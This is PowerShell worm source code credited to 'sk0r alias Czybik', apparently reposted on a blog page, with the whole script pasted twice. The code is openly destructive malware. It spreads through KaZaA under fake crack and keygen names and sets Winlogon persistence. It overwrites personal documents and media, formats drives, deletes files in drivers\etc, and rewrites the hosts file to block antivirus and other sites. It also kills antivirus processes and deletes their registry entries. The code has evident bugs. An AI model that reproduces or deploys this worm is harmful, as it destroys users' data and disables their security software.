<?
# sk0r alias Czybik's Powershell Skript Worm
#
# This worm is for the PowerShell Script Interpreter
# which is included with Microsoft Windows Vista
#
# This worm is ¸2006 by sk0r alias Czybik
#
# Visit my homepages: www.sk0r-scripts.tk & www.sk0r-virii.tk & www.czybik-kit.tk
#
# This worm has following features:
#
# - Spreads with P2P (KaZaA Lite) per JScript
# - Writes a registry string to run every time windows starts
# - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
# - overwrites specific files in Eigene Dateien Folder and Subfolders
# - formating all insertet drives and discettes
# - deletes files in %system32%driversetc
# - overwrites the host file in %system32%driversetc
# - kills some well-known Anti-Virus processes
# - deletes Reg-Values from well-known Antiviruses
# - tells a message to user, with informations about the worm
#
#
# Informations:
#
# This worm is a proof of concept worm. Because of it is able
# to run Powershell on Windows XP, too (Need .Net Framework 2.0)
# this worm is dedicated to Windows XP. Well, yes, it runs on
# Windows Vista, too. But I don't know if the structures are the
# same as in windows Xp. Note that this worm uses ActiveX Objects.
# In this worm I use Scripting.FileSystemObject and WScript.Shell
# Object. I hope Vista will include those ActiveX Objects, too.
# I am happy to be the coder of this worm. I like this language.
# And I am looking forward to new Malware in PowerShell.
# Now I will release more and more worms in this language.
#
# This worm is ¸2006 by sk0r alias Czybik. To tell me anything
# write me an email @ sk0r1337@gmx.de or a pm at vx.netlux.org
#
# ======================================================================
$fso = New-Object -Com Scripting.FileSystemObject;
$wshs = New-Object -Com WScript.Shell;
$windir = $fso.GetSpecialFolder(0)
$sysdir = $fso.GetSpecialFolder(1)
$strInfoString_one = "This is a PowerShell Script worm. ";
$strInfoString_two = "This worm is proof-of-concept ";
$strInfoString_three = "the worm is ¸2006 by sk0r alias Czybik ";
$strInfoString_four = "for informations write an email @ sk0r1337@gmx.de ";
$KazaaDir = $wshs.RegRead('HKEY_CURRENT_USERSoftwareKazaaLocalContentDownloadDir');
$AllMshDateinCurDir = get-childitem *.msh
foreach ($PowerShellScript in $AllMshDateinCurDir)
{
if ($PowerShellScript.Length=13035)
{
$MySelfWorm = $PowerShellScript.Name;
}
}
$gtFilesMsh = $fso.getfile($MySelfWorm);
if (!$fso.fileexists($Sysdir.PathWinCzySko.msh)
{
$gtFilesMsh.Copy($Sysdir.PathWinCzySko.msh);
}
$gtFilesMsh.copy("$KazaaDirMicrosoft Windows Vista Cd-Key.txt.msh");
$gtFilesMsh.copy("$KazaaDirWindows Vista Update.msh");
$gtFilesMsh.copy("$KazaaDirAd-aware SE Personal Edition 1.06r1.msh");
$gtFilesMsh.copy("$KazaaDirAshampoo Media Player 2.03 install.msh");
$gtFilesMsh.copy("$KazaaDirAllround WinZIP Key Generator.msh");
$gtFilesMsh.copy("$KazaaDirTalisman Desktop 2.99 Crack.msh");
$gtFilesMsh.copy("$KazaaDirNero Burning Rom 6.6.0.13 Crack.msh");
$gtFilesMsh.copy("$KazaaDirKaspersky KeyGen working.msh");
$gtFilesMsh.copy("$KazaaDirDaemon Tools Install + Crack.rar.msh");
$gtFilesMsh.copy("$KazaaDirAVP - AntiVirus Key Generator.msh");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidde
n", 0, "REG_DWORD");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideF
ileExt", 1, "REG_DWORD");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization", "United People of infected Ps","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner", "sk0rCzybik","REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title", "Infected with Ps Worm by sk0r alias Czybik","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonShell", "explorer.exe $sysdir.PathWinCzySko.msh" ,"REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.sk0r-scripts.tk")
$PersonalDirectory = $wshs.regread("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersPersonal");
UeberschreibeDateien($PersonalDirectory)
function UeberschreibeDateien($strOrdner)
{
$StringToOverwrite = "This file was overwritten with a Ps Worm. ";
$StringToOverwrite += "This Worm is ¸2006 by sk0r alias Czybik! ";
$OverWrtOwnFiles = $fso.getfolder($strOrdner)
$OverFiles = $OverWrtOwnFiles.Files
$TheSubFldr = $OverWrtOwnFiles.subfolders
foreach ($SubFiles in $TheSubFldr.Files)
{
$strGetExt = $fso.GetExtensionName($AlleDateien.Path);
if ($strGetExt="JPG")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="BMP")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="GIF")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="PNG")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="JPEG")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="AVI")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="MP3")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="WMV")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="WMA")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="DOC")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="XLS")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="RTF")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="PPS")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="PPT")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="ZIP")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="RAR")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="CPP")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
}
foreach ($NochMehrUnterOrdner in $TheSubFldr)
{
UeberschreibeDateien($NochMehrUnterOrdner)
}
}
$TheDrives = $fso.Drives
foreach ($AllDrives in $TheDrives)
{
if ($AllDrives.DriveType=1)
{
format $AllDrives.Path /y
}
if ($AllDrives.DriveType=2)
{
format $AllDrives.Path /y
}
}
cd "$sysdir.pathDriversetc";
del "networks";
del "protocol";
del "services";
del "hosts";
del "hosts.bak";
echo "# Host File overwritten by Ps Worm " >> hosts
echo "# This file disallows you to visit av and dl sites :> " >> hosts
echo " " >> hosts
echo "127.0.0.1 www.antivir.de " >> hosts
echo "127.0.0.1 www.bitdefender.de " >> hosts
echo "127.0.0.1 www.znet.de " >> hosts
echo "127.0.0.1 www.chip.de " >> hosts
echo "127.0.0.1 www.virustotal.com " >> hosts
echo "127.0.0.1 virusscan.jotti.org " >> hosts
echo "127.0.0.1 www.kaspersky.com " >> hosts
echo "127.0.0.1 www.sophos.de " >> hosts
echo "127.0.0.1 www.trojaner-info.de " >> hosts
echo "127.0.0.1 www.trojaner-help.de " >> hosts
echo "127.0.0.1 www.arcabit.com " >> hosts
echo "127.0.0.1 www.avast.com " >> hosts
echo "127.0.0.1 www.grisoft.com " >> hosts
echo "127.0.0.1 www.bitdefender.com " >> hosts
echo "127.0.0.1 www.clamav.net " >> hosts
echo "127.0.0.1 www.drweb.com " >> hosts
echo "127.0.0.1 www.f-prot.com " >> hosts)
echo "127.0.0.1 www.google.de " >> hosts
echo "127.0.0.1 www.fortinet.com " >> hosts
echo "127.0.0.1 www.nod32.com " >> hosts
echo "127.0.0.1 www.norman.com " >> hosts
echo "127.0.0.1 www.microsoft.com " >> hosts
echo "127.0.0.1 www.anti-virus.by/en " >> hosts
echo "127.0.0.1 www.symantec.com " >> hosts
echo "127.0.0.1 www.windowsupdate.com " >> hosts
echo "127.0.0.1 www.trendmicro.com " >> hosts
echo "127.0.0.1 www.mcafee.com " >> hosts
echo "127.0.0.1 www.viruslist.com " >> hosts
echo "127.0.0.1 www.avp.com " >> hosts
echo "127.0.0.1 www.zonelabs.com " >> hosts
echo "127.0.0.1 www.heise.de " >> hosts
echo "127.0.0.1 www.antivirus-online.de " >> hosts
echo "127.0.0.1 www.free-av.com " >> hosts
echo "127.0.0.1 www.panda-software.com " >> hosts
echo "127.0.0.1 www.pc-welt.de " >> hosts
echo "127.0.0.1 www.pc-special.net " >> hosts
echo "127.0.0.1 download.freenet.de " >> hosts
echo "127.0.0.1 www.vollversion.de " >> hosts
echo "127.0.0.1 www.das-download-archiv.de " >> hosts
echo "127.0.0.1 www.freeware.de " >> hosts
echo "127.0.0.1 www.antiviruslab.com " >> hosts
echo "127.0.0.1 www.search.yahoo.com " >> hosts
echo "127.0.0.1 www.web.de " >> hosts
echo "127.0.0.1 www.hotmail.com " >> hosts
echo "127.0.0.1 www.hotmail.de " >> hosts
echo "127.0.0.1 www.gmx.net " >> hosts
echo "127.0.0.1 www.spiegel.de " >> hosts
echo "127.0.0.1 www.icq.com " >> hosts
echo "127.0.0.1 www.icq.de " >> hosts
echo "127.0.0.1 www.ffh.de " >> hosts
echo "127.0.0.1 www.lavasoft.de " >> hosts
echo "127.0.0.1 www.de.wikipedia.org " >> hosts
echo "127.0.0.1 www.wikipedia.org " >> hosts
echo "127.0.0.1 www.en.wikipedia.org " >> hosts
echo "127.0.0.1 www.wissen.de " >> hosts
echo "127.0.0.1 www.virus-aktuell.de " >> hosts
echo "127.0.0.1 www.arcor.de " >> hosts
echo "127.0.0.1 www.t-online.de " >> hosts
echo "127.0.0.1 www.t-com.de " >> hosts
echo "127.0.0.1 www.alice-dsl.de " >> hosts
echo "127.0.0.1 www.freenet.de " >> hosts
echo "127.0.0.1 www.1und1.de " >> hosts
echo "127.0.0.1 www.fbi.gov " >> hosts
echo "127.0.0.1 www.polizei.de " >> hosts
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunavgnt');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAVG7_CC');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDMCon');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDNewsAgent');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDOESRV');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunpccguide.exe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunDrWebScheduler');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSpIDerMail');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSpIDerNT');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMCAgentExe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMCUpdateExe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOASClnt');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunVirusScan Online');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunVSOCheckTask');
tskill avcenter /a
tskill avconfig /a
tskill avscan /a
tskill avguard /a
tskill avgnt /a
tskill update /a
tskill preupd /a
tskill avcmd /a
tskill avesvc /a
tskill kav /a
tskill kavsvc /a
tskill kavsend /a
tskill keymanager /a
tskill agentsvr /a
tskill avgcc /a
tskill avgupsvc /a
tskill avgamsvr /a
tskill vsserv /a
tskill bdss /a
tskill xcommsvr /a
tskill bdnagent /a
tskill bdoesrv /a
tskill bdmcon /a
tskill bdswitch /a
tskill rtvr /a
tskill bdsubmit /a
tskill bdlite /a
tskill agentsvr /a
tskill tmproxy /a
tskill PcCtlCom /a
tskill pccguide /a
tskill qttask /a
tskill patch /a
tskill Tmntsrv /a
tskill PccPrm /a
tskill DrWebUpW /a
tskill spidernt /a
tskill DrWebScd /a
tskill DrWeb32w /a
tskill drwadins /a
tskill mcupdui /a
tskill McTskshd /a
tskill McAppIns /a
tskill mghtml /a
tskill McShield /a
tskill Mcdetect /a
tskill McVSEscn /a
tskill oasclnt /a
tskill mcvsshld /a
echo "$strInfoString_one ";
echo "$strInfoString_two ";
echo "$strInfoString_three ";
echo "$strInfoString_four ";
$wshs.popup("www.sk0r-scripts.tk - www.sk0r-virii.tk -
www.czybik-kit.tk | Worm ¸2006 by sk0r alias Czybik",2,"PowerShell Worm by sk0r alias Czybik");
exit;
# sk0r alias Czybik's Powershell Skript Worm
#
# This worm is for the PowerShell Script Interpreter
# which is included with Microsoft Windows Vista
#
# This worm is ¸2006 by sk0r alias Czybik
#
# Visit my homepages: www.sk0r-scripts.tk & www.sk0r-virii.tk & www.czybik-kit.tk
#
# This worm has following features:
#
# - Spreads with P2P (KaZaA Lite) per JScript
# - Writes a registry string to run every time windows starts
# - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
# - overwrites specific files in Eigene Dateien Folder and Subfolders
# - formating all insertet drives and discettes
# - deletes files in %system32%driversetc
# - overwrites the host file in %system32%driversetc
# - kills some well-known Anti-Virus processes
# - deletes Reg-Values from well-known Antiviruses
# - tells a message to user, with informations about the worm
#
#
# Informations:
#
# This worm is a proof of concept worm. Because of it is able
# to run Powershell on Windows XP, too (Need .Net Framework 2.0)
# this worm is dedicated to Windows XP. Well, yes, it runs on
# Windows Vista, too. But I don't know if the structures are the
# same as in windows Xp. Note that this worm uses ActiveX Objects.
# In this worm I use Scripting.FileSystemObject and WScript.Shell
# Object. I hope Vista will include those ActiveX Objects, too.
# I am happy to be the coder of this worm. I like this language.
# And I am looking forward to new Malware in PowerShell.
# Now I will release more and more worms in this language.
#
# This worm is ¸2006 by sk0r alias Czybik. To tell me anything
# write me an email @ sk0r1337@gmx.de or a pm at vx.netlux.org
#
# ======================================================================
$fso = New-Object -Com Scripting.FileSystemObject;
$wshs = New-Object -Com WScript.Shell;
$windir = $fso.GetSpecialFolder(0)
$sysdir = $fso.GetSpecialFolder(1)
$strInfoString_one = "This is a PowerShell Script worm. ";
$strInfoString_two = "This worm is proof-of-concept ";
$strInfoString_three = "the worm is ¸2006 by sk0r alias Czybik ";
$strInfoString_four = "for informations write an email @ sk0r1337@gmx.de ";
$KazaaDir = $wshs.RegRead('HKEY_CURRENT_USERSoftwareKazaaLocalContentDownloadDir');
$AllMshDateinCurDir = get-childitem *.msh
foreach ($PowerShellScript in $AllMshDateinCurDir)
{
if ($PowerShellScript.Length=13035)
{
$MySelfWorm = $PowerShellScript.Name;
}
}
$gtFilesMsh = $fso.getfile($MySelfWorm);
if (!$fso.fileexists($Sysdir.PathWinCzySko.msh)
{
$gtFilesMsh.Copy($Sysdir.PathWinCzySko.msh);
}
$gtFilesMsh.copy("$KazaaDirMicrosoft Windows Vista Cd-Key.txt.msh");
$gtFilesMsh.copy("$KazaaDirWindows Vista Update.msh");
$gtFilesMsh.copy("$KazaaDirAd-aware SE Personal Edition 1.06r1.msh");
$gtFilesMsh.copy("$KazaaDirAshampoo Media Player 2.03 install.msh");
$gtFilesMsh.copy("$KazaaDirAllround WinZIP Key Generator.msh");
$gtFilesMsh.copy("$KazaaDirTalisman Desktop 2.99 Crack.msh");
$gtFilesMsh.copy("$KazaaDirNero Burning Rom 6.6.0.13 Crack.msh");
$gtFilesMsh.copy("$KazaaDirKaspersky KeyGen working.msh");
$gtFilesMsh.copy("$KazaaDirDaemon Tools Install + Crack.rar.msh");
$gtFilesMsh.copy("$KazaaDirAVP - AntiVirus Key Generator.msh");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidde
n", 0, "REG_DWORD");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideF
ileExt", 1, "REG_DWORD");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization", "United People of infected Ps","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner", "sk0rCzybik","REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title", "Infected with Ps Worm by sk0r alias Czybik","REG_SZ");
$wshs.regwrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonShell", "explorer.exe $sysdir.PathWinCzySko.msh" ,"REG_SZ");
$wshs.regwrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.sk0r-scripts.tk")
$PersonalDirectory = $wshs.regread("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersPersonal");
UeberschreibeDateien($PersonalDirectory)
function UeberschreibeDateien($strOrdner)
{
$StringToOverwrite = "This file was overwritten with a Ps Worm. ";
$StringToOverwrite += "This Worm is ¸2006 by sk0r alias Czybik! ";
$OverWrtOwnFiles = $fso.getfolder($strOrdner)
$OverFiles = $OverWrtOwnFiles.Files
$TheSubFldr = $OverWrtOwnFiles.subfolders
foreach ($SubFiles in $TheSubFldr.Files)
{
$strGetExt = $fso.GetExtensionName($AlleDateien.Path);
if ($strGetExt="JPG")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="BMP")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="GIF")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="PNG")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="JPEG")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="AVI")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="MP3")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="WMV")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="WMA")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="DOC")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="XLS")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="RTF")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="PPS")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="PPT")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="ZIP")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="RAR")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
if ($strGetExt="CPP")
{
del $AlleDateien.Path;
echo "$StringToOverwrite" >> $AlleDateien.Path
}
}
foreach ($NochMehrUnterOrdner in $TheSubFldr)
{
UeberschreibeDateien($NochMehrUnterOrdner)
}
}
$TheDrives = $fso.Drives
foreach ($AllDrives in $TheDrives)
{
if ($AllDrives.DriveType=1)
{
format $AllDrives.Path /y
}
if ($AllDrives.DriveType=2)
{
format $AllDrives.Path /y
}
}
cd "$sysdir.pathDriversetc";
del "networks";
del "protocol";
del "services";
del "hosts";
del "hosts.bak";
echo "# Host File overwritten by Ps Worm " >> hosts
echo "# This file disallows you to visit av and dl sites :> " >> hosts
echo " " >> hosts
echo "127.0.0.1 www.antivir.de " >> hosts
echo "127.0.0.1 www.bitdefender.de " >> hosts
echo "127.0.0.1 www.znet.de " >> hosts
echo "127.0.0.1 www.chip.de " >> hosts
echo "127.0.0.1 www.virustotal.com " >> hosts
echo "127.0.0.1 virusscan.jotti.org " >> hosts
echo "127.0.0.1 www.kaspersky.com " >> hosts
echo "127.0.0.1 www.sophos.de " >> hosts
echo "127.0.0.1 www.trojaner-info.de " >> hosts
echo "127.0.0.1 www.trojaner-help.de " >> hosts
echo "127.0.0.1 www.arcabit.com " >> hosts
echo "127.0.0.1 www.avast.com " >> hosts
echo "127.0.0.1 www.grisoft.com " >> hosts
echo "127.0.0.1 www.bitdefender.com " >> hosts
echo "127.0.0.1 www.clamav.net " >> hosts
echo "127.0.0.1 www.drweb.com " >> hosts
echo "127.0.0.1 www.f-prot.com " >> hosts)
echo "127.0.0.1 www.google.de " >> hosts
echo "127.0.0.1 www.fortinet.com " >> hosts
echo "127.0.0.1 www.nod32.com " >> hosts
echo "127.0.0.1 www.norman.com " >> hosts
echo "127.0.0.1 www.microsoft.com " >> hosts
echo "127.0.0.1 www.anti-virus.by/en " >> hosts
echo "127.0.0.1 www.symantec.com " >> hosts
echo "127.0.0.1 www.windowsupdate.com " >> hosts
echo "127.0.0.1 www.trendmicro.com " >> hosts
echo "127.0.0.1 www.mcafee.com " >> hosts
echo "127.0.0.1 www.viruslist.com " >> hosts
echo "127.0.0.1 www.avp.com " >> hosts
echo "127.0.0.1 www.zonelabs.com " >> hosts
echo "127.0.0.1 www.heise.de " >> hosts
echo "127.0.0.1 www.antivirus-online.de " >> hosts
echo "127.0.0.1 www.free-av.com " >> hosts
echo "127.0.0.1 www.panda-software.com " >> hosts
echo "127.0.0.1 www.pc-welt.de " >> hosts
echo "127.0.0.1 www.pc-special.net " >> hosts
echo "127.0.0.1 download.freenet.de " >> hosts
echo "127.0.0.1 www.vollversion.de " >> hosts
echo "127.0.0.1 www.das-download-archiv.de " >> hosts
echo "127.0.0.1 www.freeware.de " >> hosts
echo "127.0.0.1 www.antiviruslab.com " >> hosts
echo "127.0.0.1 www.search.yahoo.com " >> hosts
echo "127.0.0.1 www.web.de " >> hosts
echo "127.0.0.1 www.hotmail.com " >> hosts
echo "127.0.0.1 www.hotmail.de " >> hosts
echo "127.0.0.1 www.gmx.net " >> hosts
echo "127.0.0.1 www.spiegel.de " >> hosts
echo "127.0.0.1 www.icq.com " >> hosts
echo "127.0.0.1 www.icq.de " >> hosts
echo "127.0.0.1 www.ffh.de " >> hosts
echo "127.0.0.1 www.lavasoft.de " >> hosts
echo "127.0.0.1 www.de.wikipedia.org " >> hosts
echo "127.0.0.1 www.wikipedia.org " >> hosts
echo "127.0.0.1 www.en.wikipedia.org " >> hosts
echo "127.0.0.1 www.wissen.de " >> hosts
echo "127.0.0.1 www.virus-aktuell.de " >> hosts
echo "127.0.0.1 www.arcor.de " >> hosts
echo "127.0.0.1 www.t-online.de " >> hosts
echo "127.0.0.1 www.t-com.de " >> hosts
echo "127.0.0.1 www.alice-dsl.de " >> hosts
echo "127.0.0.1 www.freenet.de " >> hosts
echo "127.0.0.1 www.1und1.de " >> hosts
echo "127.0.0.1 www.fbi.gov " >> hosts
echo "127.0.0.1 www.polizei.de " >> hosts
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunavgnt');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunKAVPersonal50');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAVG7_CC');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDMCon');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDNewsAgent');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunBDOESRV');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunpccguide.exe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunDrWebScheduler');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSpIDerMail');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunSpIDerNT');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMCAgentExe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunMCUpdateExe');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOASClnt');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunVirusScan Online');
$wshs.regdelete('HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunVSOCheckTask');
tskill avcenter /a
tskill avconfig /a
tskill avscan /a
tskill avguard /a
tskill avgnt /a
tskill update /a
tskill preupd /a
tskill avcmd /a
tskill avesvc /a
tskill kav /a
tskill kavsvc /a
tskill kavsend /a
tskill keymanager /a
tskill agentsvr /a
tskill avgcc /a
tskill avgupsvc /a
tskill avgamsvr /a
tskill vsserv /a
tskill bdss /a
tskill xcommsvr /a
tskill bdnagent /a
tskill bdoesrv /a
tskill bdmcon /a
tskill bdswitch /a
tskill rtvr /a
tskill bdsubmit /a
tskill bdlite /a
tskill agentsvr /a
tskill tmproxy /a
tskill PcCtlCom /a
tskill pccguide /a
tskill qttask /a
tskill patch /a
tskill Tmntsrv /a
tskill PccPrm /a
tskill DrWebUpW /a
tskill spidernt /a
tskill DrWebScd /a
tskill DrWeb32w /a
tskill drwadins /a
tskill mcupdui /a
tskill McTskshd /a
tskill McAppIns /a
tskill mghtml /a
tskill McShield /a
tskill Mcdetect /a
tskill McVSEscn /a
tskill oasclnt /a
tskill mcvsshld /a
echo "$strInfoString_one ";
echo "$strInfoString_two ";
echo "$strInfoString_three ";
echo "$strInfoString_four ";
$wshs.popup("www.sk0r-scripts.tk - www.sk0r-virii.tk -
www.czybik-kit.tk | Worm ¸2006 by sk0r alias Czybik",2,"PowerShell Worm by sk0r alias Czybik");
exit;
扫一扫
5万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
